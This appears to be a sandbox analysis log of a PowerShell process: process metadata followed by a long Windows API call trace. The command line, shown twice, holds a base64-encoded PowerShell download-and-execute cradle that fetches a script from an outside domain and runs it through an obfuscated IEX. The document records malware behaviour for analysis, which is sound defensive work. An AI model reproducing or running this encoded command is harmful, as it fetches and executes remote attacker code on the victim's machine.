	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 555
	os_tid = 0x13fc


Thread:
	id = 648
	os_tid = 0x1450


Thread:
	id = 655
	os_tid = 0x1470


Process:
	id = "107"
	image_name = "powershell.exe"
	filename = "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe"
	page_root = "0x788dd000"
	os_pid = "0x10e8"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0xb40"
	cmd_line = "\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" powershell -EncodedCommand JABwAGEAdABoACAAPQAgACcALwBmAGEAeAAuAHAAaABwAD8AaQBkAD0AYQBkAG0AaQBuACcAOwAgACQAaABvAHMAdABuAGEAbQBlACAAPQAgACcAegBhAHIAYQB0AG8AbwBuAHMALgBpAG4AZgBvACcAOwAgAEkAJwAnAEUAJwAnAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAApAC4AZABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AJwAgACsAIAAkAGgAbwBzAHQAbgBhAG0AZQAgACsAIAAkAHAAYQB0AGgAKQA7AA=="
	cur_dir = "C:\\Windows\\system32\\"
	os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz"
	bitness = "64"
	os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 564
	os_tid = 0xc18

	[0828.526] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0835.936] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0835.938] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe
	[0835.938] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0835.938] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a
	[0918.387] sprintf_s (in: _DstBuf=0xced98, _DstSize=0x11, _Format="get_%s" | out: _DstBuf="get_MemberType") returned 14
	[0926.167] GetVersionExW (in: lpVersionInformation=0xcd8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd8a0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0926.170] GetVersionExW (in: lpVersionInformation=0xcd8a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd8a0*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0927.400] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd4c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0927.406] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0927.406] GetVersionExW (in: lpVersionInformation=0xcd610*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xcd610*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0927.407] SetErrorMode (uMode=0x1) returned 0x1
	[0927.408] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0xcd770 | out: lpFileInformation=0xcd770*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa85ac0a8, ftCreationTime.dwHighDateTime=0x1cb892b, ftLastAccessTime.dwLowDateTime=0xa85ac0a8, ftLastAccessTime.dwHighDateTime=0x1cb892b, ftLastWriteTime.dwLowDateTime=0xa85d2208, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1
	[0927.409] SetErrorMode (uMode=0x1) returned 0x1
	[0927.412] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0xcd9e0 | out: lpdwHandle=0xcd9e0) returned 0x94c
	[0927.415] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x2c772f0 | out: lpData=0x2c772f0) returned 1
	[0927.418] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd958, puLen=0xcd950 | out: lplpBuffer=0xcd958*=0x2c7738c, puLen=0xcd950) returned 1
	[0927.421] lstrlenW (lpString="䅁") returned 1
	[0927.430] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x2c77468, puLen=0xcd8c0) returned 1
	[0927.431] lstrlenW (lpString="Microsoft Corporation") returned 21
	[0927.433] CoTaskMemAlloc (cb=0x2e) returned 0x1f34a0
	[0927.433] lstrcpyW (in: lpString1=0x1f34a0, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation"
	[0927.434] CoTaskMemFree (pv=0x1f34a0) 
	[0927.435] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x2c774bc, puLen=0xcd8c0) returned 1
	[0927.435] lstrlenW (lpString="System.Management.Automation") returned 28
	[0927.435] CoTaskMemAlloc (cb=0x3c) returned 0x1b1270
	[0927.435] lstrcpyW (in: lpString1=0x1b1270, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation"
	[0927.435] CoTaskMemFree (pv=0x1b1270) 
	[0927.435] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x2c77518, puLen=0xcd8c0) returned 1
	[0927.435] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0927.435] CoTaskMemAlloc (cb=0x20) returned 0x1f8ae0
	[0927.435] lstrcpyW (in: lpString1=0x1f8ae0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0927.435] CoTaskMemFree (pv=0x1f8ae0) 
	[0927.435] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x2c77558, puLen=0xcd8c0) returned 1
	[0927.435] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0927.435] CoTaskMemAlloc (cb=0x44) returned 0x1b1270
	[0927.435] lstrcpyW (in: lpString1=0x1b1270, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0927.435] CoTaskMemFree (pv=0x1b1270) 
	[0927.435] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x2c775c0, puLen=0xcd8c0) returned 1
	[0927.435] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57
	[0927.435] CoTaskMemAlloc (cb=0x76) returned 0x19ed20
	[0927.435] lstrcpyW (in: lpString1=0x19ed20, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0927.435] CoTaskMemFree (pv=0x19ed20) 
	[0927.435] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x2c7765c, puLen=0xcd8c0) returned 1
	[0927.435] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0927.435] CoTaskMemAlloc (cb=0x44) returned 0x1b1270
	[0927.435] lstrcpyW (in: lpString1=0x1b1270, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0927.435] CoTaskMemFree (pv=0x1b1270) 
	[0927.435] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x2c776c0, puLen=0xcd8c0) returned 1
	[0927.435] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0927.435] CoTaskMemAlloc (cb=0x58) returned 0x1c01f0
	[0927.436] lstrcpyW (in: lpString1=0x1c01f0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0927.436] CoTaskMemFree (pv=0x1c01f0) 
	[0927.436] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x2c7773c, puLen=0xcd8c0) returned 1
	[0927.436] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0927.436] CoTaskMemAlloc (cb=0x20) returned 0x1f8ae0
	[0927.436] lstrcpyW (in: lpString1=0x1f8ae0, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0927.436] CoTaskMemFree (pv=0x1f8ae0) 
	[0927.436] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x2c773e4, puLen=0xcd8c0) returned 1
	[0927.436] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0927.436] CoTaskMemAlloc (cb=0x66) returned 0x17c4b0
	[0927.436] lstrcpyW (in: lpString1=0x17c4b0, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0927.436] CoTaskMemFree (pv=0x17c4b0) 
	[0927.436] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x0, puLen=0xcd8c0) returned 0
	[0927.436] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x0, puLen=0xcd8c0) returned 0
	[0927.436] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0xcd8c8, puLen=0xcd8c0 | out: lplpBuffer=0xcd8c8*=0x0, puLen=0xcd8c0) returned 0
	[0927.436] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0xcd898, puLen=0xcd890 | out: lplpBuffer=0xcd898*=0x2c7738c, puLen=0xcd890) returned 1
	[0927.437] CoTaskMemAlloc (cb=0x204) returned 0x1a1da0
	[0927.438] VerLanguageNameW (in: wLang=0x0, szLang=0x1a1da0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0928.550] CoTaskMemFree (pv=0x1a1da0) 
	[0928.550] VerQueryValueW (in: pBlock=0x2c772f0, lpSubBlock="\\", lplpBuffer=0xcd8e8, puLen=0xcd8e0 | out: lplpBuffer=0xcd8e8*=0x2c77318, puLen=0xcd8e0) returned 1
	[0928.556] GetCurrentProcessId () returned 0x10e8
	[0928.575] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0xcc810 | out: lpLuid=0xcc810*(LowPart=0x14, HighPart=0)) returned 1
	[0928.580] GetCurrentProcess () returned 0xffffffffffffffff
	[0928.580] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x20, TokenHandle=0xcc830 | out: TokenHandle=0xcc830*=0x2cc) returned 1
	[0928.581] AdjustTokenPrivileges (in: TokenHandle=0x2cc, DisableAllPrivileges=0, NewState=0x2c7ab68*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1
	[0928.583] CloseHandle (hObject=0x2cc) returned 1
	[0928.587] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x10e8) returned 0x2cc
	[0929.579] EnumProcessModules (in: hProcess=0x2cc, lphModule=0x2c7abd0, cb=0x200, lpcbNeeded=0xcd848 | out: lphModule=0x2c7abd0, lpcbNeeded=0xcd848) returned 1
	[0929.581] GetModuleInformation (in: hProcess=0x2cc, hModule=0x13f370000, lpmodinfo=0x2c7ae40, cb=0x18 | out: lpmodinfo=0x2c7ae40*(lpBaseOfDll=0x13f370000, SizeOfImage=0x77000, EntryPoint=0x13f37c63c)) returned 1
	[0929.582] CoTaskMemAlloc (cb=0x804) returned 0x1f9b80
	[0929.583] GetModuleBaseNameW (in: hProcess=0x2cc, hModule=0x13f370000, lpBaseName=0x1f9b80, nSize=0x800 | out: lpBaseName="powershell.exe") returned 0xe
	[0929.583] CoTaskMemFree (pv=0x1f9b80) 
	[0929.584] CoTaskMemAlloc (cb=0x804) returned 0x1f9b80
	[0929.584] GetModuleFileNameExW (in: hProcess=0x2cc, hModule=0x13f370000, lpFilename=0x1f9b80, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39
	[0929.584] CoTaskMemFree (pv=0x1f9b80) 
	[0929.584] CloseHandle (hObject=0x2cc) returned 1
	[0929.592] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x10e8) returned 0x2cc
	[0929.594] GetExitCodeProcess (in: hProcess=0x2cc, lpExitCode=0xcd978 | out: lpExitCode=0xcd978*=0x103) returned 1
	[0929.597] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c7b088, Length=0x20000, ResultLength=0xcd940 | out: SystemInformation=0x12c7b088, ResultLength=0xcd940*=0x4a730) returned 0xc0000004
	[0929.602] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x12c9b0b8, Length=0x4cf30, ResultLength=0xcd940 | out: SystemInformation=0x12c9b0b8, ResultLength=0xcd940*=0x4a5f0) returned 0x0
	[0931.871] EnumWindows (lpEnumFunc=0x2a066ac, lParam=0x0) 
	[0931.873] GetWindowThreadProcessId (in: hWnd=0x10090, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.873] GetWindowThreadProcessId (in: hWnd=0x3013e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x558
	[0931.874] GetWindowThreadProcessId (in: hWnd=0x201ba, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.874] GetWindowThreadProcessId (in: hWnd=0x300fe, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.874] GetWindowThreadProcessId (in: hWnd=0x400ae, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.874] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x538
	[0931.874] GetWindowThreadProcessId (in: hWnd=0x20118, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.874] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x778
	[0931.874] GetWindowThreadProcessId (in: hWnd=0x20028, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x778
	[0931.874] GetWindowThreadProcessId (in: hWnd=0x1007c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.875] GetWindowThreadProcessId (in: hWnd=0x1007a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.875] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.875] GetWindowThreadProcessId (in: hWnd=0x10084, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.875] GetWindowThreadProcessId (in: hWnd=0x10082, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.875] GetWindowThreadProcessId (in: hWnd=0x1007e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.875] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.875] GetWindowThreadProcessId (in: hWnd=0x10056, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.875] GetWindowThreadProcessId (in: hWnd=0x100fa, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x460
	[0931.876] GetWindowThreadProcessId (in: hWnd=0x500a2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.876] GetWindowThreadProcessId (in: hWnd=0x10092, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4d0
	[0931.876] GetWindowThreadProcessId (in: hWnd=0x10bd6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2440
	[0931.876] GetWindowThreadProcessId (in: hWnd=0x10bb6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x24d8
	[0931.876] GetWindowThreadProcessId (in: hWnd=0x10ba8, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1aa4
	[0931.876] GetWindowThreadProcessId (in: hWnd=0x10b74, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1ff0
	[0931.876] GetWindowThreadProcessId (in: hWnd=0x10b66, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1a84
	[0931.877] GetWindowThreadProcessId (in: hWnd=0x10b62, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1fb0
	[0931.877] GetWindowThreadProcessId (in: hWnd=0x10b5e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1e10
	[0931.877] GetWindowThreadProcessId (in: hWnd=0x10b52, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x23a8
	[0931.877] GetWindowThreadProcessId (in: hWnd=0x20b46, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1f24
	[0931.877] GetWindowThreadProcessId (in: hWnd=0x20b3c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x21ec
	[0931.877] GetWindowThreadProcessId (in: hWnd=0x20b32, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2320
	[0931.877] GetWindowThreadProcessId (in: hWnd=0x10b28, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1fd4
	[0931.877] GetWindowThreadProcessId (in: hWnd=0x10b0c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1880
	[0931.878] GetWindowThreadProcessId (in: hWnd=0x10af6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b18
	[0931.878] GetWindowThreadProcessId (in: hWnd=0x10aea, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1d6c
	[0931.878] GetWindowThreadProcessId (in: hWnd=0x10ade, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x233c
	[0931.878] GetWindowThreadProcessId (in: hWnd=0x10ad2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2368
	[0931.878] GetWindowThreadProcessId (in: hWnd=0x10ace, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2124
	[0931.878] GetWindowThreadProcessId (in: hWnd=0x10aca, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x22f0
	[0931.878] GetWindowThreadProcessId (in: hWnd=0x10ac4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x22ac
	[0931.878] GetWindowThreadProcessId (in: hWnd=0x30932, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1cdc
	[0931.879] GetWindowThreadProcessId (in: hWnd=0x308c2, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x10f0
	[0931.879] GetWindowThreadProcessId (in: hWnd=0x10ab6, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1f18
	[0931.879] GetWindowThreadProcessId (in: hWnd=0x10ab4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x20a8
	[0931.879] GetWindowThreadProcessId (in: hWnd=0x10a78, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2004
	[0931.879] GetWindowThreadProcessId (in: hWnd=0x10a68, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1f88
	[0931.879] GetWindowThreadProcessId (in: hWnd=0x10a4a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1f84
	[0931.879] GetWindowThreadProcessId (in: hWnd=0x20a3e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x2050
	[0931.879] GetWindowThreadProcessId (in: hWnd=0x40528, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1e04
	[0931.880] GetWindowThreadProcessId (in: hWnd=0x20816, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1ecc
	[0931.880] GetWindowThreadProcessId (in: hWnd=0x10a2c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1e64
	[0931.880] GetWindowThreadProcessId (in: hWnd=0x2056e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b58
	[0931.880] GetWindowThreadProcessId (in: hWnd=0x10a1e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1e94
	[0931.880] GetWindowThreadProcessId (in: hWnd=0x10a0e, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1e28
	[0931.880] GetWindowThreadProcessId (in: hWnd=0x10a0a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1df8
	[0931.880] GetWindowThreadProcessId (in: hWnd=0x10a06, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1da8
	[0931.880] GetWindowThreadProcessId (in: hWnd=0x3060a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1c70
	[0931.881] GetWindowThreadProcessId (in: hWnd=0x109ec, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x163c
	[0931.881] GetWindowThreadProcessId (in: hWnd=0x109de, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1a10
	[0931.881] GetWindowThreadProcessId (in: hWnd=0x109c4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x186c
	[0931.881] GetWindowThreadProcessId (in: hWnd=0x109b4, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1d74
	[0931.881] GetWindowThreadProcessId (in: hWnd=0x1099a, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x4c8
	[0931.881] GetWindowThreadProcessId (in: hWnd=0x1098c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1960
	[0931.881] GetWindowThreadProcessId (in: hWnd=0x1097c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1ce4
	[0931.881] GetWindowThreadProcessId (in: hWnd=0x1093c, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1b24
	[0931.882] GetWindowThreadProcessId (in: hWnd=0x20942, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x14e0
	[0931.882] GetWindowThreadProcessId (in: hWnd=0x204b0, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x17f0
	[0931.882] GetWindowThreadProcessId (in: hWnd=0x10952, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x854
	[0931.882] GetWindowThreadProcessId (in: hWnd=0x10950, lpdwProcessId=0xcd6a0 | out: lpdwProcessId=0xcd6a0) returned 0x1268
